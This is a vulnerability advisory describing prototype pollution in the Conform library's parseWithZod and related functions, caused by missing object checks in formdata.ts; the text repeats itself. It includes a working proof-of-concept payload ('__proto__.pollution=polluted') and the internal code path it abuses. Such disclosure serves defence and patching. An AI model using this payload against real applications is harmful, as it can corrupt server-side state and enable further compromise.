Summary
Conform allows the parsing of nested objects in the form of object.property
. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith...
functions.
PoC
const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod");
const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });
parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"
Details
The invocation of the parseWithZod
function in the above PoC triggers the setValue
function through getSubmissionContext
and parse
, executing the following process, resulting in prototype pollution:
let pointer = value;
pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;
pointer.polluted = "polluted";
This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key]
without proper validation.
Impact
Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.
Summary
Conform allows the parsing of nested objects in the form of
object.property
. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input toparseWith...
functions.PoC
Details
The invocation of the
parseWithZod
function in the above PoC triggers thesetValue
function throughgetSubmissionContext
andparse
, executing the following process, resulting in prototype pollution:This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of
pointer[key]
without proper validation.Impact
Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.